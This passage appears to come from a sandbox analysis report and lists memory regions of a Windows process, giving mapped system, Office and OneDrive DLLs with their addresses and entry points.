0x7fef4333580 region_type = mapped_file name = "qutil.dll" filename = "\\Windows\\System32\\QUTIL.DLL" (normalized: "c:\\windows\\system32\\qutil.dll") Region: id = 623 start_va = 0x7fef4350000 end_va = 0x7fef450cfff monitored = 0 entry_point = 0x7fef4351010 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 624 start_va = 0x7fef4510000 end_va = 0x7fef4548fff monitored = 0 entry_point = 0x7fef4511240 region_type = mapped_file name = "portabledevicetypes.dll" filename = "\\Windows\\System32\\PortableDeviceTypes.dll" (normalized: "c:\\windows\\system32\\portabledevicetypes.dll") Region: id = 625 start_va = 0x7fef4550000 end_va = 0x7fef456ffff monitored = 0 entry_point = 0x7fef4551298 region_type = mapped_file name = "wpdshserviceobj.dll" filename = "\\Windows\\System32\\WPDShServiceObj.dll" (normalized: "c:\\windows\\system32\\wpdshserviceobj.dll") Region: id = 626 start_va = 0x7fef4570000 end_va = 0x7fef457ffff monitored = 0 entry_point = 0x7fef45795dc region_type = mapped_file name = "alttab.dll" filename = "\\Windows\\System32\\AltTab.dll" (normalized: "c:\\windows\\system32\\alttab.dll") Region: id = 627 start_va = 0x7fef4580000 end_va = 0x7fef480afff monitored = 0 entry_point = 0x7fef4586f5c region_type = mapped_file name = "netshell.dll" filename = "\\Windows\\System32\\netshell.dll" (normalized: "c:\\windows\\system32\\netshell.dll") Region: id = 628 start_va = 0x7fef4810000 end_va = 0x7fef4883fff monitored = 0 entry_point = 0x7fef48454c8 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 629 start_va = 0x7fef4890000 end_va = 0x7fef4900fff monitored = 0 entry_point = 0x7fef48cecc4 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 630 start_va = 0x7fef4910000 end_va = 0x7fef4978fff monitored = 0 entry_point = 0x7fef4911198 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 631 start_va = 0x7fef4a50000 end_va = 0x7fef4a70fff monitored = 0 entry_point = 0x7fef4a573a0 region_type = mapped_file name = "uianimation.dll" filename = "\\Windows\\System32\\UIAnimation.dll" (normalized: "c:\\windows\\system32\\uianimation.dll") Region: id = 632 start_va = 0x7fef4af0000 end_va = 0x7fef4bacfff monitored = 0 entry_point = 0x7fef4af1ea4 region_type = mapped_file name = "portabledeviceapi.dll" filename = "\\Windows\\System32\\PortableDeviceApi.dll" (normalized: "c:\\windows\\system32\\portabledeviceapi.dll") Region: id = 633 start_va = 0x7fef4bf0000 end_va = 0x7fef4bfbfff monitored = 0 entry_point = 0x7fef4bf602c region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 634 start_va = 0x7fef6a50000 end_va = 0x7fef6ac3fff monitored = 0 entry_point = 0x7fef6a566f0 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 635 start_va = 0x7fef8240000 end_va = 0x7fef82b2fff monitored = 0 entry_point = 0x7fef829c7f8 region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files\\internet explorer\\ieproxy.dll") Region: id = 636 start_va = 0x7fef8580000 end_va = 0x7fef8588fff monitored = 0 entry_point = 0x7fef8582f98 region_type = mapped_file name = "midimap.dll" filename = "\\Windows\\System32\\midimap.dll" (normalized: "c:\\windows\\system32\\midimap.dll") Region: id = 637 start_va = 0x7fef8590000 end_va = 0x7fef85a7fff monitored = 0 entry_point = 0x7fef8591060 region_type = mapped_file name = "msacm32.dll" filename = "\\Windows\\System32\\msacm32.dll" (normalized: "c:\\windows\\system32\\msacm32.dll") Region: id = 638 start_va = 0x7fef85b0000 end_va = 0x7fef85b9fff monitored = 0 entry_point = 0x7fef85b49f0 region_type = mapped_file name = "msacm32.drv" filename = "\\Windows\\System32\\msacm32.drv" (normalized: "c:\\windows\\system32\\msacm32.drv") Region: id = 639 start_va = 0x7fef85d0000 end_va = 0x7fef861efff monitored = 0 entry_point = 0x7fef85d2760 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 640 start_va = 0x7fef8620000 end_va = 0x7fef865afff monitored = 0 entry_point = 0x7fef8647600 region_type = mapped_file name = "wdmaud.drv" filename = "\\Windows\\System32\\wdmaud.drv" (normalized: "c:\\windows\\system32\\wdmaud.drv") Region: id = 641 start_va = 0x7fef8660000 end_va = 0x7fef869afff monitored = 0 entry_point = 0x7fef86622f0 region_type = mapped_file name = "winmm.dll" filename = "\\Windows\\System32\\winmm.dll" (normalized: "c:\\windows\\system32\\winmm.dll") Region: id = 642 start_va = 0x7fef86a0000 end_va = 0x7fef883bfff monitored = 0 entry_point = 0x7fef86a1030 region_type = mapped_file name = "networkexplorer.dll" filename = "\\Windows\\System32\\networkexplorer.dll" (normalized: "c:\\windows\\system32\\networkexplorer.dll") Region: id = 643 start_va = 0x7fef8860000 end_va = 0x7fef88defff monitored = 0 entry_point = 0x7fef88b385c region_type = mapped_file name = "tiptsf.dll" filename = "\\Program Files\\Common Files\\Microsoft Shared\\ink\\tiptsf.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\tiptsf.dll") Region: id = 644 start_va = 0x7fef88e0000 end_va = 0x7fef891afff monitored = 0 entry_point = 0x7fef88e1070 region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\System32\\msls31.dll" (normalized: "c:\\windows\\system32\\msls31.dll") Region: id = 645 start_va = 0x7fef8920000 end_va = 0x7fef892afff monitored = 0 entry_point = 0x7fef8921030 region_type = mapped_file name = "ehsso.dll" filename = "\\Windows\\ehome\\ehSSO.dll" (normalized: "c:\\windows\\ehome\\ehsso.dll") Region: id = 646 start_va = 0x7fef8930000 end_va = 0x7fef89e9fff monitored = 0 entry_point = 0x7fef893115c region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 647 start_va = 0x7fef89f0000 end_va = 0x7fef8a6bfff monitored = 0 entry_point = 0x7fef89f11d4 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 648 start_va = 0x7fef8a70000 end_va = 0x7fef8d12fff monitored = 0 entry_point = 0x7fef8a73498 region_type = mapped_file name = "gameux.dll" filename = "\\Windows\\System32\\gameux.dll" (normalized: "c:\\windows\\system32\\gameux.dll") Region: id = 649 start_va = 0x7fef8da0000 end_va = 0x7fef8dabfff monitored = 0 entry_point = 0x7fef8da1380 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 650 start_va = 0x7fef8db0000 end_va = 0x7fef8de3fff monitored = 0 entry_point = 0x7fef8db1890 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 651 start_va = 0x7fef8df0000 end_va = 0x7fef8eddfff monitored = 0 entry_point = 0x7fef8df12a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 652 start_va = 0x7fef9100000 end_va = 0x7fef9117fff monitored = 0 entry_point = 0x7fef9101bf8 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 653 start_va = 0x7fef9120000 end_va = 0x7fef9130fff monitored = 0 entry_point = 0x7fef91216ac region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 654 start_va = 0x7fef95e0000 end_va = 0x7fef9662fff monitored = 0 entry_point = 0x7fef960692c region_type = mapped_file name = "timedate.cpl" filename = "\\Windows\\System32\\timedate.cpl" (normalized: "c:\\windows\\system32\\timedate.cpl") Region: id = 655 start_va = 0x7fef9690000 end_va = 0x7fef969afff monitored = 0 entry_point = 0x7fef9695740 region_type = mapped_file name = "hcproviders.dll" filename = "\\Windows\\System32\\hcproviders.dll" (normalized: "c:\\windows\\system32\\hcproviders.dll") Region: id = 656 start_va = 0x7fef96a0000 end_va = 0x7fef96e2fff monitored = 0 entry_point = 0x7fef96c1b50 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 657 start_va = 0x7fef96f0000 end_va = 0x7fef96f9fff monitored = 0 entry_point = 0x7fef96f4938 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll") Region: id = 658 start_va = 0x7fef9700000 end_va = 0x7fef971bfff monitored = 0 entry_point = 0x7fef9701198 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\System32\\davclnt.dll" (normalized: "c:\\windows\\system32\\davclnt.dll") Region: id = 659 start_va = 0x7fef9720000 end_va = 0x7fef9741fff monitored = 0 entry_point = 0x7fef9721198 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\System32\\ntlanman.dll" (normalized: "c:\\windows\\system32\\ntlanman.dll") Region: id = 660 start_va = 0x7fef9750000 end_va = 0x7fef9759fff monitored = 0 entry_point = 0x7fef9751198 region_type = mapped_file name = "drprov.dll" filename = "\\Windows\\System32\\drprov.dll" (normalized: "c:\\windows\\system32\\drprov.dll") Region: id = 661 start_va = 0x7fef9760000 end_va = 0x7fef987efff monitored = 0 entry_point = 0x7fef977339c region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 662 start_va = 0x7fef9880000 end_va = 0x7fef98a7fff monitored = 0 entry_point = 0x7fef9893cc4 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 663 start_va = 0x7fef9920000 end_va = 0x7fef9932fff monitored = 0 entry_point = 0x7fef992a8b8 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 664 start_va = 0x7fef9950000 end_va = 0x7fef9957fff monitored = 0 entry_point = 0x7fef9951030 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 665 start_va = 0x7fef9960000 end_va = 0x7fef99dffff monitored = 0 entry_point = 0x7fef9964a8c region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 666 start_va = 0x7fef99e0000 end_va = 0x7fef99eefff monitored = 0 entry_point = 0x7fef99e1040 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 667 start_va = 0x7fef99f0000 end_va = 0x7fef99fbfff monitored = 0 entry_point = 0x7fef99f1070 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 668 start_va = 0x7fef9a00000 end_va = 0x7fef9a7dfff monitored = 0 entry_point = 0x7fef9a01304 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 669 start_va = 0x7fef9a80000 end_va = 0x7fef9ab4fff monitored = 0 entry_point = 0x7fef9a8c59c region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 670 start_va = 0x7fef9ac0000 end_va = 0x7fefa33dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\1033\\grooveintlresource.dll") Region: id = 671 start_va = 0x7fefa340000 end_va = 0x7fefa4f8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "office.odf" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Cultures\\OFFICE.ODF" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\cultures\\office.odf") Region: id = 672 start_va = 0x7fefa500000 end_va = 0x7fefa815fff monitored = 0 entry_point = 0x7fefa503e98 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 673 start_va = 0x7fefa820000 end_va = 0x7fefa822fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-utility-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-utility-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-utility-l1-1-0.dll") Region: id = 674 start_va = 0x7fefa830000 end_va = 0x7fefa832fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-environment-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-environment-l1-1-0.dll") Region: id = 675 start_va = 0x7fefa840000 end_va = 0x7fefa842fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-filesystem-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-filesystem-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-filesystem-l1-1-0.dll") Region: id = 676 start_va = 0x7fefa850000 end_va = 0x7fefa852fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-time-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-time-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-time-l1-1-0.dll") Region: id = 677 start_va = 0x7fefa860000 end_va = 0x7fefa864fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-multibyte-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-multibyte-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-multibyte-l1-1-0.dll") Region: id = 678 start_va = 0x7fefa870000 end_va = 0x7fefa874fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-math-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-math-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-math-l1-1-0.dll") Region: id = 679 start_va = 0x7fefa880000 end_va = 0x7fefa882fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-locale-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-locale-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-locale-l1-1-0.dll") Region: id = 680 start_va = 0x7fefa890000 end_va = 0x7fefa92dfff monitored = 0 entry_point = 0x7fefa8d9d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\msvcp140.dll") Region: id = 681 start_va = 0x7fefa930000 end_va = 0x7fefa933fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-convert-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-convert-l1-1-0.dll") Region: id = 682 start_va = 0x7fefa940000 end_va = 0x7fefa943fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-stdio-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-stdio-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-stdio-l1-1-0.dll") Region: id = 683 start_va = 0x7fefa950000 end_va = 0x7fefa952fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-heap-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-heap-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-heap-l1-1-0.dll") Region: id = 684 start_va = 0x7fefa960000 end_va = 0x7fefa963fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-string-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-string-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-string-l1-1-0.dll") Region: id = 685 start_va = 0x7fefa970000 end_va = 0x7fefa972fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l1-2-0.dll") Region: id = 686 start_va = 0x7fefa980000 end_va = 0x7fefa982fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-processthreads-l1-1-1.dll" filename = "\\Windows\\System32\\api-ms-win-core-processthreads-l1-1-1.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-processthreads-l1-1-1.dll") Region: id = 687 start_va = 0x7fefa990000 end_va = 0x7fefa992fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 688 start_va = 0x7fefa9a0000 end_va = 0x7fefa9a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-localization-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-localization-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-localization-l1-2-0.dll") Region: id = 689 start_va = 0x7fefa9b0000 end_va = 0x7fefa9b2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-file-l2-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-file-l2-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-file-l2-1-0.dll") Region: id = 690 start_va = 0x7fefa9c0000 end_va = 0x7fefa9c2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-core-timezone-l1-1-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-timezone-l1-1-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-timezone-l1-1-0.dll") Region: id = 691 start_va = 0x7fefa9d0000 end_va = 0x7fefaac1fff monitored = 0 entry_point = 0x7fefa9d9060 region_type = mapped_file name = "ucrtbase.dll" filename = "\\Windows\\System32\\ucrtbase.dll" (normalized: "c:\\windows\\system32\\ucrtbase.dll") Region: id = 692 start_va = 0x7fefaad0000 end_va = 0x7fefaad3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "api-ms-win-crt-runtime-l1-1-0.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\api-ms-win-crt-runtime-l1-1-0.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\api-ms-win-crt-runtime-l1-1-0.dll") Region: id = 693 start_va = 0x7fefaae0000 end_va = 0x7fefaaf6fff monitored = 0 entry_point = 0x7fefaaec440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\vcruntime140.dll") Region: id = 694 start_va = 0x7fefab00000 end_va = 0x7fefad13fff monitored = 0 entry_point = 0x7fefab01000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\grooveex.dll") Region: id = 695 start_va = 0x7fefad20000 end_va = 0x7fefadedfff monitored = 0 entry_point = 0x7fefad430fc region_type = mapped_file name = "msvcr110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcr110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcr110.dll") Region: id = 696 start_va = 0x7fefadf0000 end_va = 0x7fefae96fff monitored = 0 entry_point = 0x7fefae3b93c region_type = mapped_file name = "msvcp110.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\msvcp110.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\msvcp110.dll") Region: id = 697 start_va = 0x7fefaea0000 end_va = 0x7fefaef5fff monitored = 0 entry_point = 0x7fefaea86e8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\amd64\\filesyncshell64.dll") Region: id = 698 start_va = 0x7fefaf00000 end_va = 0x7fefaf56fff monitored = 0 entry_point = 0x7fefaf01118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 699 start_va = 0x7fefaf60000 end_va = 0x7fefb129fff monitored = 0 entry_point = 0x7fefaf67a60 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 700 start_va = 0x7fefb130000 end_va = 0x7fefb147fff monitored = 0 entry_point = 0x7fefb131010 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 701 start_va = 0x7fefb150000 end_va = 0x7fefb165fff monitored = 0 entry_point = 0x7fefb151050 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 702 start_va = 0x7fefb170000 end_va = 0x7fefb1b2fff monitored = 0 entry_point = 0x7fefb1730d8 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 703 start_va = 0x7fefb230000 end_va = 0x7fefb23afff monitored = 0 entry_point = 0x7fefb231198 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 704 start_va = 0x7fefb240000 end_va = 0x7fefb266fff monitored = 0 entry_point = 0x7fefb2498bc region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 705 start_va = 0x7fefb270000 end_va = 0x7fefb2d6fff monitored = 0 entry_point = 0x7fefb286060 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 706 start_va = 0x7fefb2f0000 end_va = 0x7fefb2fafff monitored = 0 entry_point = 0x7fefb2f4f8c region_type = mapped_file name = "slc.dll" filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll") Region: id = 707 start_va = 0x7fefb320000 end_va = 0x7fefb338fff monitored = 0 entry_point = 0x7fefb3211a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 708 start_va = 0x7fefb3c0000 end_va = 0x7fefb3d4fff monitored = 0 entry_point = 0x7fefb3c60d8 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 709 start_va = 0x7fefb4b0000 end_va = 0x7fefb5d6fff monitored = 0 entry_point = 0x7fefb4b10ec region_type = mapped_file name = "taskschd.dll" filename = "\\Windows\\System32\\taskschd.dll" (normalized: "c:\\windows\\system32\\taskschd.dll") Region: id = 710 start_va = 0x7fefb6c0000 end_va = 0x7fefb6d8fff monitored = 0 entry_point = 0x7fefb6d077c region_type = mapped_file name = "wercplsupport.dll" filename = "\\Windows\\System32\\wercplsupport.dll" (normalized: "c:\\windows\\system32\\wercplsupport.dll") Region: id = 711 start_va = 0x7fefb6e0000 end_va = 0x7fefb6e8fff monitored = 0 entry_point = 0x7fefb6e1010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 712 start_va = 0x7fefb6f0000 end_va = 0x7fefb71bfff monitored = 0 entry_point = 0x7fefb6f15c4 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 713 start_va = 0x7fefb920000 end_va = 0x7fefb933fff monitored = 0 entry_point = 0x7fefb9216b4 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 714 start_va = 0x7fefb940000 end_va = 0x7fefb954fff monitored = 0 entry_point = 0x7fefb941050 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 715 start_va = 0x7fefb960000 end_va = 0x7fefb96bfff monitored = 0 entry_point = 0x7fefb9618a4 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 716 start_va = 0x7fefbaa0000 end_va = 0x7fefbab0fff monitored = 0 entry_point = 0x7fefbaa1070 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 717 start_va = 0x7fefbad0000 end_va = 0x7fefbbf9fff monitored = 0 entry_point = 0x7fefbad3810 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 718 start_va = 0x7fefbc00000 end_va = 0x7fefbc34fff monitored = 0 entry_point = 0x7fefbc01064 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 719 start_va = 0x7fefbc40000 end_va = 0x7fefbc57fff monitored = 0 entry_point = 0x7fefbc41130 region_type = mapped_file name = 